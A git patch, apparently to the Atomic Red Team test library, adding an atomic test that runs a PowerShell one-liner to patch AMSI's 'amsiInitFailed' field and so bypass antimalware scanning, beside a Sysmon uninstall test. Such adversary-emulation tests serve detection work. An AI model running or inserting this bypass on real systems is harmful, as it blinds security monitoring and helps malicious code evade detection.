From 26263baec9e87f6624953b5f79d0565f552022ef Mon Sep 17 00:00:00 2001
From: JimmyAstle <JimmyAstle@users.noreply.github.com>
Date: Tue, 17 Sep 2019 14:33:22 -0400
Subject: [PATCH] New Detection - T1089 (#568)

Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true. This is a simple atomic test that executes this unhooking behavior
---
 atomics/T1089/T1089.yaml | 13 +++++++++++++
 1 file changed, 13 insertions(+)

diff --git a/atomics/T1089/T1089.yaml b/atomics/T1089/T1089.yaml
index 30f5839e..83a9f35a 100644
--- a/atomics/T1089/T1089.yaml
+++ b/atomics/T1089/T1089.yaml
@@ -150,3 +150,16 @@ atomic_tests:
       sysmon -u
     cleanup_command: |
       sysmon -i -accepteula
+
+- name: AMSI Bypass - AMSI InitFailed
+  description: |
+    Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true. 
+    https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
+  supported_platforms:
+    - windows
+
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)